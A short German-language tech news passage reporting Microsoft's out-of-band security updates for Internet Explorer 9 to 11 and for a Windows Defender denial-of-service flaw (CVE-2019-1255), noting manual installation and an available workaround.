Betroffen davon sind Internet Explorer 9, 10 und 11 unter verschiedenen Windows-Versionen. Zum jetzigen Zeitpunkt ist das Update einen Support-Beitrag von Microsoft zufolge noch nicht über Windows Update verfügbar. Dementsprechend muss man es manuell herunterladen und installieren. Microsoft will das Sicherheitsupdate erst im Oktober zum Patchday über Windows Update verteilen.
Wer den Patch derzeit nicht installieren kann, sollte sein System mit einem Workaround absichern. Wie das funktioniert, erläutert Microsoft am Ende eines Beitrags zur Lücke.
Noch ein Notfallupdate
Auch Windows Defender bekommt einen Patch außer der Reihe. Das Ausnutzen der Sicherheitslücke (CVE-2019-1255) kann den Viren-Scanner in einen DoS-Zustand versetzen. Das Update gilt als "wichtig". Damit eine Attacke klappt, benötigt ein Angreifer bereits Zugriff auf ein System, führt Microsoft in einer Warnmeldung aus.